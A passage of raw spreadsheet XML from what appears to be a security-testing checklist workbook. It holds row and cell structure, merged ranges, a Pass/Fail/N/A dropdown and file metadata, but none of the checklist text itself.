      <c r="F43" s="10"/>
    </row>
    <row r="44" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A44" s="13">
        <v>43</v>
      </c>
      <c r="B44" s="81"/>
      <c r="C44" s="12" t="s">
        <v>96</v>
      </c>
      <c r="D44" s="12" t="s">
        <v>97</v>
      </c>
      <c r="E44" s="10"/>
      <c r="F44" s="10"/>
    </row>
    <row r="45" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A45" s="13">
        <v>44</v>
      </c>
      <c r="B45" s="81"/>
      <c r="C45" s="12" t="s">
        <v>98</v>
      </c>
      <c r="D45" s="12" t="s">
        <v>99</v>
      </c>
      <c r="E45" s="10"/>
      <c r="F45" s="10"/>
    </row>
    <row r="46" spans="1:6" ht="29" x14ac:dyDescent="0.35">
      <c r="A46" s="13">
        <v>45</v>
      </c>
      <c r="B46" s="81"/>
      <c r="C46" s="12" t="s">
        <v>100</v>
      </c>
      <c r="D46" s="12" t="s">
        <v>101</v>
      </c>
      <c r="E46" s="10"/>
      <c r="F46" s="10"/>
    </row>
    <row r="47" spans="1:6" ht="58" x14ac:dyDescent="0.35">
      <c r="A47" s="13">
        <v>46</v>
      </c>
      <c r="B47" s="81"/>
      <c r="C47" s="12" t="s">
        <v>102</v>
      </c>
      <c r="D47" s="12" t="s">
        <v>103</v>
      </c>
      <c r="E47" s="10"/>
      <c r="F47" s="10"/>
    </row>
    <row r="48" spans="1:6" ht="29" x14ac:dyDescent="0.35">
      <c r="A48" s="14">
        <v>47</v>
      </c>
      <c r="B48" s="82" t="s">
        <v>104</v>
      </c>
      <c r="C48" s="6" t="s">
        <v>105</v>
      </c>
      <c r="D48" s="6" t="s">
        <v>106</v>
      </c>
      <c r="E48" s="8"/>
      <c r="F48" s="8"/>
    </row>
    <row r="49" spans="1:6" ht="29" x14ac:dyDescent="0.35">
      <c r="A49" s="14">
        <v>48</v>
      </c>
      <c r="B49" s="82"/>
      <c r="C49" s="6" t="s">
        <v>107</v>
      </c>
      <c r="D49" s="6" t="s">
        <v>108</v>
      </c>
      <c r="E49" s="8"/>
      <c r="F49" s="8"/>
    </row>
    <row r="50" spans="1:6" ht="29" x14ac:dyDescent="0.35">
      <c r="A50" s="14">
        <v>49</v>
      </c>
      <c r="B50" s="82"/>
      <c r="C50" s="6" t="s">
        <v>109</v>
      </c>
      <c r="D50" s="6" t="s">
        <v>110</v>
      </c>
      <c r="E50" s="8"/>
      <c r="F50" s="8"/>
    </row>
    <row r="51" spans="1:6" ht="29" x14ac:dyDescent="0.35">
      <c r="A51" s="14">
        <v>50</v>
      </c>
      <c r="B51" s="82"/>
      <c r="C51" s="6" t="s">
        <v>111</v>
      </c>
      <c r="D51" s="6" t="s">
        <v>112</v>
      </c>
      <c r="E51" s="8"/>
      <c r="F51" s="8"/>
    </row>
    <row r="52" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A52" s="14">
        <v>51</v>
      </c>
      <c r="B52" s="82"/>
      <c r="C52" s="6" t="s">
        <v>113</v>
      </c>
      <c r="D52" s="6" t="s">
        <v>114</v>
      </c>
      <c r="E52" s="8"/>
      <c r="F52" s="8"/>
    </row>
    <row r="53" spans="1:6" ht="29" x14ac:dyDescent="0.35">
      <c r="A53" s="14">
        <v>52</v>
      </c>
      <c r="B53" s="82"/>
      <c r="C53" s="6" t="s">
        <v>115</v>
      </c>
      <c r="D53" s="6" t="s">
        <v>116</v>
      </c>
      <c r="E53" s="8"/>
      <c r="F53" s="8"/>
    </row>
    <row r="54" spans="1:6" ht="43.5" x14ac:dyDescent="0.35">
      <c r="A54" s="14">
        <v>53</v>
      </c>
      <c r="B54" s="82"/>
      <c r="C54" s="6" t="s">
        <v>117</v>
      </c>
      <c r="D54" s="6" t="s">
        <v>118</v>
      </c>
      <c r="E54" s="8"/>
      <c r="F54" s="8"/>
    </row>
    <row r="55" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A55" s="14">
        <v>54</v>
      </c>
      <c r="B55" s="82"/>
      <c r="C55" s="6" t="s">
        <v>119</v>
      </c>
      <c r="D55" s="6" t="s">
        <v>120</v>
      </c>
      <c r="E55" s="8"/>
      <c r="F55" s="8"/>
    </row>
    <row r="56" spans="1:6" ht="29" x14ac:dyDescent="0.35">
      <c r="A56" s="14">
        <v>55</v>
      </c>
      <c r="B56" s="82"/>
      <c r="C56" s="6" t="s">
        <v>121</v>
      </c>
      <c r="D56" s="6" t="s">
        <v>122</v>
      </c>
      <c r="E56" s="8"/>
      <c r="F56" s="8"/>
    </row>
    <row r="57" spans="1:6" ht="58" x14ac:dyDescent="0.35">
      <c r="A57" s="14">
        <v>56</v>
      </c>
      <c r="B57" s="82"/>
      <c r="C57" s="6" t="s">
        <v>123</v>
      </c>
      <c r="D57" s="6" t="s">
        <v>124</v>
      </c>
      <c r="E57" s="8"/>
      <c r="F57" s="8"/>
    </row>
    <row r="58" spans="1:6" ht="43.5" x14ac:dyDescent="0.35">
      <c r="A58" s="14">
        <v>57</v>
      </c>
      <c r="B58" s="82"/>
      <c r="C58" s="6" t="s">
        <v>125</v>
      </c>
      <c r="D58" s="6" t="s">
        <v>126</v>
      </c>
      <c r="E58" s="8"/>
      <c r="F58" s="8"/>
    </row>
    <row r="59" spans="1:6" ht="58" x14ac:dyDescent="0.35">
      <c r="A59" s="14">
        <v>58</v>
      </c>
      <c r="B59" s="82"/>
      <c r="C59" s="6" t="s">
        <v>127</v>
      </c>
      <c r="D59" s="6" t="s">
        <v>128</v>
      </c>
      <c r="E59" s="8"/>
      <c r="F59" s="8"/>
    </row>
    <row r="60" spans="1:6" ht="29" x14ac:dyDescent="0.35">
      <c r="A60" s="14">
        <v>59</v>
      </c>
      <c r="B60" s="82"/>
      <c r="C60" s="6" t="s">
        <v>129</v>
      </c>
      <c r="D60" s="6" t="s">
        <v>130</v>
      </c>
      <c r="E60" s="8"/>
      <c r="F60" s="8"/>
    </row>
    <row r="61" spans="1:6" ht="29" x14ac:dyDescent="0.35">
      <c r="A61" s="14">
        <v>60</v>
      </c>
      <c r="B61" s="82"/>
      <c r="C61" s="6" t="s">
        <v>131</v>
      </c>
      <c r="D61" s="6" t="s">
        <v>132</v>
      </c>
      <c r="E61" s="8"/>
      <c r="F61" s="8"/>
    </row>
    <row r="62" spans="1:6" ht="29" x14ac:dyDescent="0.35">
      <c r="A62" s="14">
        <v>61</v>
      </c>
      <c r="B62" s="82"/>
      <c r="C62" s="6" t="s">
        <v>133</v>
      </c>
      <c r="D62" s="6" t="s">
        <v>134</v>
      </c>
      <c r="E62" s="8"/>
      <c r="F62" s="8"/>
    </row>
    <row r="63" spans="1:6" ht="29" x14ac:dyDescent="0.35">
      <c r="A63" s="14">
        <v>62</v>
      </c>
      <c r="B63" s="82"/>
      <c r="C63" s="6" t="s">
        <v>135</v>
      </c>
      <c r="D63" s="6" t="s">
        <v>136</v>
      </c>
      <c r="E63" s="8"/>
      <c r="F63" s="8"/>
    </row>
    <row r="64" spans="1:6" ht="29" x14ac:dyDescent="0.35">
      <c r="A64" s="14">
        <v>63</v>
      </c>
      <c r="B64" s="82"/>
      <c r="C64" s="6" t="s">
        <v>137</v>
      </c>
      <c r="D64" s="6" t="s">
        <v>138</v>
      </c>
      <c r="E64" s="8"/>
      <c r="F64" s="8"/>
    </row>
    <row r="65" spans="1:6" ht="43.5" x14ac:dyDescent="0.35">
      <c r="A65" s="14">
        <v>64</v>
      </c>
      <c r="B65" s="82"/>
      <c r="C65" s="6" t="s">
        <v>139</v>
      </c>
      <c r="D65" s="6" t="s">
        <v>140</v>
      </c>
      <c r="E65" s="8"/>
      <c r="F65" s="8"/>
    </row>
    <row r="66" spans="1:6" ht="29" x14ac:dyDescent="0.35">
      <c r="A66" s="14">
        <v>65</v>
      </c>
      <c r="B66" s="82"/>
      <c r="C66" s="6" t="s">
        <v>141</v>
      </c>
      <c r="D66" s="6" t="s">
        <v>142</v>
      </c>
      <c r="E66" s="8"/>
      <c r="F66" s="8"/>
    </row>
    <row r="67" spans="1:6" ht="43.5" x14ac:dyDescent="0.35">
      <c r="A67" s="14">
        <v>66</v>
      </c>
      <c r="B67" s="82"/>
      <c r="C67" s="6" t="s">
        <v>143</v>
      </c>
      <c r="D67" s="6" t="s">
        <v>144</v>
      </c>
      <c r="E67" s="8"/>
      <c r="F67" s="8"/>
    </row>
    <row r="68" spans="1:6" ht="29" x14ac:dyDescent="0.35">
      <c r="A68" s="14">
        <v>67</v>
      </c>
      <c r="B68" s="82"/>
      <c r="C68" s="6" t="s">
        <v>145</v>
      </c>
      <c r="D68" s="6" t="s">
        <v>146</v>
      </c>
      <c r="E68" s="8"/>
      <c r="F68" s="8"/>
    </row>
    <row r="69" spans="1:6" ht="72.5" x14ac:dyDescent="0.35">
      <c r="A69" s="14">
        <v>68</v>
      </c>
      <c r="B69" s="82"/>
      <c r="C69" s="6" t="s">
        <v>147</v>
      </c>
      <c r="D69" s="6" t="s">
        <v>148</v>
      </c>
      <c r="E69" s="8"/>
      <c r="F69" s="8"/>
    </row>
    <row r="70" spans="1:6" ht="43.5" x14ac:dyDescent="0.35">
      <c r="A70" s="13">
        <v>69</v>
      </c>
      <c r="B70" s="73" t="s">
        <v>149</v>
      </c>
      <c r="C70" s="12" t="s">
        <v>150</v>
      </c>
      <c r="D70" s="12" t="s">
        <v>151</v>
      </c>
      <c r="E70" s="10"/>
      <c r="F70" s="10"/>
    </row>
    <row r="71" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A71" s="13">
        <v>70</v>
      </c>
      <c r="B71" s="73"/>
      <c r="C71" s="12" t="s">
        <v>216</v>
      </c>
      <c r="D71" s="12" t="s">
        <v>217</v>
      </c>
      <c r="E71" s="10"/>
      <c r="F71" s="10"/>
    </row>
    <row r="72" spans="1:6" ht="58" x14ac:dyDescent="0.35">
      <c r="A72" s="13">
        <v>71</v>
      </c>
      <c r="B72" s="73"/>
      <c r="C72" s="12" t="s">
        <v>152</v>
      </c>
      <c r="D72" s="12" t="s">
        <v>153</v>
      </c>
      <c r="E72" s="10"/>
      <c r="F72" s="10"/>
    </row>
    <row r="73" spans="1:6" ht="29" x14ac:dyDescent="0.35">
      <c r="A73" s="14">
        <v>72</v>
      </c>
      <c r="B73" s="82" t="s">
        <v>154</v>
      </c>
      <c r="C73" s="7" t="s">
        <v>155</v>
      </c>
      <c r="D73" s="7" t="s">
        <v>156</v>
      </c>
      <c r="E73" s="8"/>
      <c r="F73" s="8"/>
    </row>
    <row r="74" spans="1:6" ht="72.5" x14ac:dyDescent="0.35">
      <c r="A74" s="14">
        <v>73</v>
      </c>
      <c r="B74" s="82"/>
      <c r="C74" s="7" t="s">
        <v>157</v>
      </c>
      <c r="D74" s="7" t="s">
        <v>158</v>
      </c>
      <c r="E74" s="8"/>
      <c r="F74" s="8"/>
    </row>
    <row r="75" spans="1:6" ht="58" x14ac:dyDescent="0.35">
      <c r="A75" s="13">
        <v>74</v>
      </c>
      <c r="B75" s="73" t="s">
        <v>159</v>
      </c>
      <c r="C75" s="12" t="s">
        <v>160</v>
      </c>
      <c r="D75" s="12" t="s">
        <v>161</v>
      </c>
      <c r="E75" s="10"/>
      <c r="F75" s="10"/>
    </row>
    <row r="76" spans="1:6" ht="58" x14ac:dyDescent="0.35">
      <c r="A76" s="13">
        <v>75</v>
      </c>
      <c r="B76" s="73"/>
      <c r="C76" s="12" t="s">
        <v>162</v>
      </c>
      <c r="D76" s="12" t="s">
        <v>163</v>
      </c>
      <c r="E76" s="10"/>
      <c r="F76" s="10"/>
    </row>
    <row r="77" spans="1:6" ht="58" x14ac:dyDescent="0.35">
      <c r="A77" s="13">
        <v>76</v>
      </c>
      <c r="B77" s="73"/>
      <c r="C77" s="12" t="s">
        <v>164</v>
      </c>
      <c r="D77" s="12" t="s">
        <v>165</v>
      </c>
      <c r="E77" s="10"/>
      <c r="F77" s="10"/>
    </row>
    <row r="78" spans="1:6" ht="58" x14ac:dyDescent="0.35">
      <c r="A78" s="13">
        <v>77</v>
      </c>
      <c r="B78" s="73"/>
      <c r="C78" s="12" t="s">
        <v>166</v>
      </c>
      <c r="D78" s="12" t="s">
        <v>167</v>
      </c>
      <c r="E78" s="10"/>
      <c r="F78" s="10"/>
    </row>
    <row r="79" spans="1:6" ht="72.5" x14ac:dyDescent="0.35">
      <c r="A79" s="13">
        <v>78</v>
      </c>
      <c r="B79" s="73"/>
      <c r="C79" s="12" t="s">
        <v>168</v>
      </c>
      <c r="D79" s="12" t="s">
        <v>169</v>
      </c>
      <c r="E79" s="10"/>
      <c r="F79" s="10"/>
    </row>
    <row r="80" spans="1:6" ht="58" x14ac:dyDescent="0.35">
      <c r="A80" s="13">
        <v>79</v>
      </c>
      <c r="B80" s="73"/>
      <c r="C80" s="12" t="s">
        <v>170</v>
      </c>
      <c r="D80" s="12" t="s">
        <v>171</v>
      </c>
      <c r="E80" s="10"/>
      <c r="F80" s="10"/>
    </row>
    <row r="81" spans="1:6" ht="130.5" x14ac:dyDescent="0.35">
      <c r="A81" s="13">
        <v>80</v>
      </c>
      <c r="B81" s="73"/>
      <c r="C81" s="12" t="s">
        <v>172</v>
      </c>
      <c r="D81" s="12" t="s">
        <v>173</v>
      </c>
      <c r="E81" s="10"/>
      <c r="F81" s="10"/>
    </row>
    <row r="82" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A82" s="14">
        <v>81</v>
      </c>
      <c r="B82" s="74" t="s">
        <v>174</v>
      </c>
      <c r="C82" s="7" t="s">
        <v>175</v>
      </c>
      <c r="D82" s="7" t="s">
        <v>176</v>
      </c>
      <c r="E82" s="8"/>
      <c r="F82" s="8"/>
    </row>
    <row r="83" spans="1:6" ht="29" x14ac:dyDescent="0.35">
      <c r="A83" s="14">
        <v>82</v>
      </c>
      <c r="B83" s="75"/>
      <c r="C83" s="7" t="s">
        <v>177</v>
      </c>
      <c r="D83" s="7" t="s">
        <v>178</v>
      </c>
      <c r="E83" s="8"/>
      <c r="F83" s="8"/>
    </row>
    <row r="84" spans="1:6" ht="29" x14ac:dyDescent="0.35">
      <c r="A84" s="14">
        <v>83</v>
      </c>
      <c r="B84" s="75"/>
      <c r="C84" s="7" t="s">
        <v>179</v>
      </c>
      <c r="D84" s="7" t="s">
        <v>180</v>
      </c>
      <c r="E84" s="8"/>
      <c r="F84" s="8"/>
    </row>
    <row r="85" spans="1:6" ht="29" x14ac:dyDescent="0.35">
      <c r="A85" s="14">
        <v>84</v>
      </c>
      <c r="B85" s="75"/>
      <c r="C85" s="7" t="s">
        <v>181</v>
      </c>
      <c r="D85" s="7" t="s">
        <v>182</v>
      </c>
      <c r="E85" s="8"/>
      <c r="F85" s="8"/>
    </row>
    <row r="86" spans="1:6" ht="58" x14ac:dyDescent="0.35">
      <c r="A86" s="14">
        <v>85</v>
      </c>
      <c r="B86" s="75"/>
      <c r="C86" s="7" t="s">
        <v>183</v>
      </c>
      <c r="D86" s="7" t="s">
        <v>184</v>
      </c>
      <c r="E86" s="8"/>
      <c r="F86" s="8"/>
    </row>
    <row r="87" spans="1:6" ht="29" x14ac:dyDescent="0.35">
      <c r="A87" s="14">
        <v>86</v>
      </c>
      <c r="B87" s="75"/>
      <c r="C87" s="7" t="s">
        <v>185</v>
      </c>
      <c r="D87" s="7" t="s">
        <v>186</v>
      </c>
      <c r="E87" s="8"/>
      <c r="F87" s="8"/>
    </row>
    <row r="88" spans="1:6" ht="29" x14ac:dyDescent="0.35">
      <c r="A88" s="14">
        <v>87</v>
      </c>
      <c r="B88" s="75"/>
      <c r="C88" s="7" t="s">
        <v>187</v>
      </c>
      <c r="D88" s="7" t="s">
        <v>188</v>
      </c>
      <c r="E88" s="8"/>
      <c r="F88" s="8"/>
    </row>
    <row r="89" spans="1:6" ht="29" x14ac:dyDescent="0.35">
      <c r="A89" s="14">
        <v>88</v>
      </c>
      <c r="B89" s="75"/>
      <c r="C89" s="7" t="s">
        <v>189</v>
      </c>
      <c r="D89" s="7" t="s">
        <v>190</v>
      </c>
      <c r="E89" s="8"/>
      <c r="F89" s="8"/>
    </row>
    <row r="90" spans="1:6" ht="29" x14ac:dyDescent="0.35">
      <c r="A90" s="14">
        <v>89</v>
      </c>
      <c r="B90" s="75"/>
      <c r="C90" s="7" t="s">
        <v>191</v>
      </c>
      <c r="D90" s="7" t="s">
        <v>192</v>
      </c>
      <c r="E90" s="8"/>
      <c r="F90" s="8"/>
    </row>
    <row r="91" spans="1:6" ht="58" x14ac:dyDescent="0.35">
      <c r="A91" s="14">
        <v>90</v>
      </c>
      <c r="B91" s="75"/>
      <c r="C91" s="7" t="s">
        <v>193</v>
      </c>
      <c r="D91" s="7" t="s">
        <v>194</v>
      </c>
      <c r="E91" s="8"/>
      <c r="F91" s="8"/>
    </row>
    <row r="92" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A92" s="14">
        <v>91</v>
      </c>
      <c r="B92" s="76"/>
      <c r="C92" s="7" t="s">
        <v>214</v>
      </c>
      <c r="D92" s="7" t="s">
        <v>215</v>
      </c>
      <c r="E92" s="8"/>
      <c r="F92" s="8"/>
    </row>
    <row r="93" spans="1:6" ht="29" x14ac:dyDescent="0.35">
      <c r="A93" s="13">
        <v>92</v>
      </c>
      <c r="B93" s="73" t="s">
        <v>195</v>
      </c>
      <c r="C93" s="11" t="s">
        <v>196</v>
      </c>
      <c r="D93" s="12" t="s">
        <v>197</v>
      </c>
      <c r="E93" s="10"/>
      <c r="F93" s="10"/>
    </row>
    <row r="94" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A94" s="13">
        <v>93</v>
      </c>
      <c r="B94" s="73"/>
      <c r="C94" s="11" t="s">
        <v>198</v>
      </c>
      <c r="D94" s="12" t="s">
        <v>199</v>
      </c>
      <c r="E94" s="10"/>
      <c r="F94" s="10"/>
    </row>
    <row r="95" spans="1:6" ht="29" x14ac:dyDescent="0.35">
      <c r="A95" s="14">
        <v>94</v>
      </c>
      <c r="B95" s="7" t="s">
        <v>200</v>
      </c>
      <c r="C95" s="7" t="s">
        <v>201</v>
      </c>
      <c r="D95" s="7" t="s">
        <v>202</v>
      </c>
      <c r="E95" s="7"/>
      <c r="F95" s="7"/>
    </row>
  </sheetData>
  <mergeCells count="12">
    <mergeCell ref="B93:B94"/>
    <mergeCell ref="B2:B8"/>
    <mergeCell ref="B9:B15"/>
    <mergeCell ref="B16:B22"/>
    <mergeCell ref="B23:B34"/>
    <mergeCell ref="B35:B38"/>
    <mergeCell ref="B39:B47"/>
    <mergeCell ref="B48:B69"/>
    <mergeCell ref="B70:B72"/>
    <mergeCell ref="B73:B74"/>
    <mergeCell ref="B75:B81"/>
    <mergeCell ref="B82:B92"/>
  </mergeCells>
  <dataValidations count="1">
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="E2:E131" xr:uid="{EDF9F6CA-4B8D-4E03-8374-E58B685F653B}">
      <formula1>"Pass,Fail,N/A"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48F56-4F32-4A83-82EE-C37C55844B5F}">
  <dimension ref="A1:L2"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <selection activeCell="D6" sqref="D6"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.5" x14ac:dyDescent="0.35"/>
  <cols>
    <col min="1" max="1" width="5.81640625" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="17" customWidth="1"/>
    <col min="3" max="3" width="14.54296875" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="7.453125" bestFit="1" customWidth="1"/>
    <col min="5" max="5" width="9.81640625" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="10.1796875" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="21.7265625" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="11.1796875" bestFit="1" customWidth="1"/>
    <col min="9" max="9" width="10.81640625" bestFit="1" customWidth="1"/>
    <col min="10" max="10" width="15.7265625" bestFit="1" customWidth="1"/>
    <col min="11" max="11" width="13.54296875" bestFit="1" customWidth="1"/>
    <col min="12" max="12" width="15.1796875" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:12" x14ac:dyDescent="0.35">
      <c r="A1" s="2" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="4" t="s">
        <v>203</v>
      </c>
      <c r="C1" s="4" t="s">
        <v>204</v>
      </c>
      <c r="D1" s="4" t="s">
        <v>205</v>
      </c>
      <c r="E1" s="4" t="s">
        <v>206</v>
      </c>
      <c r="F1" s="4" t="s">
        <v>207</v>
      </c>
      <c r="G1" s="4" t="s">
        <v>208</v>
      </c>
      <c r="H1" s="4" t="s">
        <v>209</v>
      </c>
      <c r="I1" s="4" t="s">
        <v>210</v>
      </c>
      <c r="J1" s="4" t="s">
        <v>211</v>
      </c>
      <c r="K1" s="4" t="s">
        <v>212</v>
      </c>
      <c r="L1" s="4" t="s">
        <v>213</v>
      </c>
    </row>
    <row r="2" spans="1:12" x14ac:dyDescent="0.35">
      <c r="A2" s="3">
        <v>1</v>
      </c>
      <c r="B2" s="3"/>
      <c r="C2" s="3"/>
      <c r="D2" s="3"/>
      <c r="E2" s="3"/>
      <c r="F2" s="3"/>
      <c r="G2" s="3"/>
      <c r="H2" s="3"/>
      <c r="I2" s="3"/>
      <c r="J2"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Testing Prerequisites</vt:lpstr>
      <vt:lpstr>Checklist</vt:lpstr>
      <vt:lpstr>Vulnerability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Anas A N</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Anas A N</cp:lastModifiedBy>
  <cp:revision/>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-02-05T06:56:58Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-02-07T09:27:18Z</dcterms:modified>
  <cp:category/>
  <cp:contentStatus/>
</cp:coreProperties>
</file>